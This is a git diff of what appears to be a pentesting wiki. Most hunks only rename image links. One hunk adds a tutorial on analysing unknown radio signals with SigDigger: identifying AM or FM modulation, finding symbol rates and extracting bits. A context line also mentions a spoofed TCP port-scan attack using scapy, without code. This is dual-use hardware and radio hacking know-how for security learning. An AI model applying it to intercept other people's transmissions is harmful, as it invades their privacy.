@@ -344,7 +344,7 @@ If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**
 
 Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
 
-![](<../../.gitbook/assets/image (635).png>)
+![](<../../.gitbook/assets/image (635) (1).png>)
 
 To perform this attack you could use scapy: `pip install scapy`
 
diff --git a/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 4e5c2691246..d12bc32389d 100644
--- a/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -8,7 +8,7 @@ BLE devices communicate is by sending **advertising packets** (**beacons**), the
 
 The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.
 
-![](<../.gitbook/assets/image (201) (2).png>)
+![](<../.gitbook/assets/image (201) (2) (1).png>)
 
 The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
 
diff --git a/todo/hardware-hacking/README.md b/todo/hardware-hacking/README.md
index 3a8ff4252ed..c76aaaf50fc 100644
--- a/todo/hardware-hacking/README.md
+++ b/todo/hardware-hacking/README.md
@@ -8,7 +8,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl
 
 We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
 
-![](<../../.gitbook/assets/image (648).png>)
+![](<../../.gitbook/assets/image (648) (1).png>)
 
 Hardware tools to communicate with UART:
 
diff --git a/todo/hardware-hacking/i2c.md b/todo/hardware-hacking/i2c.md
index 0774f42aa98..35ac5d97b5d 100644
--- a/todo/hardware-hacking/i2c.md
+++ b/todo/hardware-hacking/i2c.md
@@ -12,7 +12,7 @@ To connect with the bus pirate you can follow the docs:
 
 In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
 
-![](<../../.gitbook/assets/image (465).png>)
+![](<../../.gitbook/assets/image (465) (2).png>)
 
 To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
 In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
@@ -120,7 +120,7 @@ NACK
 
 In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:
 
-![](<../../.gitbook/assets/image (201).png>)
+![](<../../.gitbook/assets/image (201) (2).png>)
 
 ```bash
 I2C>m
diff --git a/todo/hardware-hacking/radio.md b/todo/hardware-hacking/radio.md
index 86ad8cee313..6c98470158f 100644
--- a/todo/hardware-hacking/radio.md
+++ b/todo/hardware-hacking/radio.md
@@ -1,8 +1,179 @@
 # Radio
 
-## Synchronize with radio channel
+## SigDigger
+
+****[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time).
+
+### Basic Config
+
+After installing there are a few things that you could consider configuring.\
+In settings (the second tab button) you can select the **SDR device** or **select a file** to read and which frequency to syntonise and the Sample rate (recommended to up to 2.56Msps if your PC support it)\
+
+
+![](<../../.gitbook/assets/image (655).png>)
+
+In the GUI behaviour it's recommended to enable a few things if your PC support it:
+
+![](<../../.gitbook/assets/image (465).png>)
+
+{% hint style="info" %}
+If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
+{% endhint %}
+
+### Synchronize with radio channel
 
 With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with the channel you want to hear, configure "Baseband audio preview" option, configure the bandwith to get all the info being sent and then set the Tuner to the level before the noise is really starting to increase:
 
 ![](<../../.gitbook/assets/image (389).png>)
 
+## Interesting tricks
+
+* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
+* In frames of information you usually should **find different frames well aligned between them**:
+
+![](<../../.gitbook/assets/image (659).png>)
+
+![](<../../.gitbook/assets/image (652).png>)
+
+* After recovering the bytes you might need to process them someway. For example, in Manchester codification a up+down will be a 1 or 0 and a down+up will be the other one. So pairs of 1s and 0s (ups and downs) will be a real 1 or a real 0.
+
+### Uncovering modulation type with IQ
+
+There are 3 ways to store information in signals: Modulating the **amplitude**, **frequency** or **phase**.\
+If you are checking a signal there are different ways to try to figure out what is being used to store information (fin more ways below) but a good one is to check the IQ graph.
+
+![](<../../.gitbook/assets/image (630).png>)
+
+* **Detecting AM**: If in the IQ graph appears for example **2 circles** (probably one in 0 and other in a different amplitude), it could means that this is an AM signal. This is because in the IQ graph the distance between the 0 and the circle is the amplitude of the signal, so it's easy to visualize different amplitudes being used.
+* **Detecting PM**: Like in the previous image, if you find small circles not related between them it probably means that a phase modulation is used. This is because in the IQ graph, the angle between the point and the 0,0 is the phase of the signal, so that means that 4 different phases are used.
+
+## AM Example
+
+### Uncovering AM
+
+#### Checking the envelope
+
+Checking AM info with [**SigDigger** ](https://github.com/BatchDrake/SigDigger)and just looking at the **envelop** you can see different clear amplitude levels. The used signal is sending pulses with information in AM, this is how one pulse looks like:
+
+![](<../../.gitbook/assets/image (636).png>)
+
+And this is how part of the symbol looks like with the waveform:
+
+![](<../../.gitbook/assets/image (650).png>)
+
+#### Checking the Histogram
+
+You can **select the whole signal** where information is located, select **Amplitude** mode and **Selection** and click on **Histogram.** You can observer that 2 clear levels are only found
+
+![](<../../.gitbook/assets/image (647).png>)
+
+For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
+
+![](<../../.gitbook/assets/image (637).png>)
+
+If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
+
+#### With IQ
+
+In this example you can see how there is a **big circle** but also **a lot of points in the centre.**
+
+![](<../../.gitbook/assets/image (640).png>)
+
+### Get Symbol Rate
+
+#### With one symbol
+
+Select the smallest symbol you can find (so you are sure it's just 1) and check the "Selection freq". I this case it would be 1.013kHz (so 1kHz).
+
+![](<../../.gitbook/assets/image (638).png>)
+
+#### With a group of symbols
+
+You can also indicate the number of symbols you are going to select and SigDigger will calculate the frequency of 1 symbol (the more symbols selected the better probably). In this scenario I selected 10 symbols and the "Selection freq" is 1.004 Khz:
+
+![](<../../.gitbook/assets/image (635).png>)
+
+### Get Bits
+
+Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
+
+![](<../../.gitbook/assets/image (642).png>)
+
+* **Sync to selection intervals** means that if you previously selected intervals to find the symbol rate, that symbol rate will be used.
+* **Manual** means that the indicated symbol rate is going to be used
+* In **Fixed interval selection** you indicate the number of intervals that should be selected and it calculates the symbol rate from it
+* **Gadner clock recovery** is usually the best option, but you still need to indicate some approximate symbol rate.
+
+Pressing sample this appears:
+
+![](<../../.gitbook/assets/image (658).png>)
+
+Now, to make SigDigger understand **where is the range** of the level carrying information you need to click on the **lower level** and maintain clicked until the biggest level:
+
+![](<../../.gitbook/assets/image (662).png>)
+
+If there would have been for example **4 different levels of amplitude**, you should have need to configure the **Bits per symbol to 2** and select from the smallest to the biggest.
+
+Finally **increasing** the **Zoom** and **changing the Row size** you can see the bits (and you can select all and copy to get all the bits):
+
+![](<../../.gitbook/assets/image (649).png>)
+
+If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no way to know which symbol is** 00, 01, 10, 11, so it will use different **grey scales** the represent each (and if you copy the bits it will use **numbers from 0 to 3**, you will need to treat them).
+
+Also, use **codifications** such as **Manchester**, and **up+down** can be **1 or 0** and an down+up can be a 1 or 0. In those cases you need to **treat the obtained ups (1) and downs (0)** to substitute the pairs of 01 or 10 as 0s or 1s.
+
+## FM Example
+
+### Uncovering FM
+
+#### Checking the frequencies and waveform
+
+Signal example sending information modulated in FM:
+
+![](<../../.gitbook/assets/image (661).png>)
+
+In the previous image you can observe pretty good that **2 frequencies are used** but if you **observe** the **waveform** you might n**ot be able to identify correctly the 2 different frequencies**:
+
+![](<../../.gitbook/assets/image (653).png>)
+
+This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative:
+
+&#x20;
+
+![](<../../.gitbook/assets/image (656).png>)
+
+If the synchronized frequency is **closer to one frequency than to the other** you can easily see the 2 different frequencies:
+
+![](<../../.gitbook/assets/image (648).png>)
+
+![](<../../.gitbook/assets/image (634).png>)
+
+#### Checking the histogram
+
+Checking the frequency histogram of the signal with information you can easily see 2 different signals:
+
+![](<../../.gitbook/assets/image (657).png>)
+
+In this case if you check the **Amplitude histogram** you will find **only one amplitude**, so it **cannot be AM** (if you find a lot of amplitudes it might be because the signal has been losing power along the channel):
+
+![](<../../.gitbook/assets/image (646).png>)
+
+And this is would be phase histogram (which makes very clear the signal is not modulated in phase):
+
+![](<../../.gitbook/assets/image (201).png>)
+
+#### With IQ
+
+IQ doesn't have a field to identify frequencies (distance to centre is amplitude and angle is phase).\
+Therefore, to identify FM, you should **only see basically a circle** in this graph.\
+Moreover,
+
+![](<../../.gitbook/assets/image (643).png>)
+
+### Get Symbol Rate
+
+You can use the **same technique as the one used in the AM example** to get the symbol rate once you have found the frequencies carrying symbols.
+
+### Get Bits
+
+You can use the **same technique as the one used in the AM example** to get the bits once you have **found the signal is modulated in frequency** and the **symbol rate**.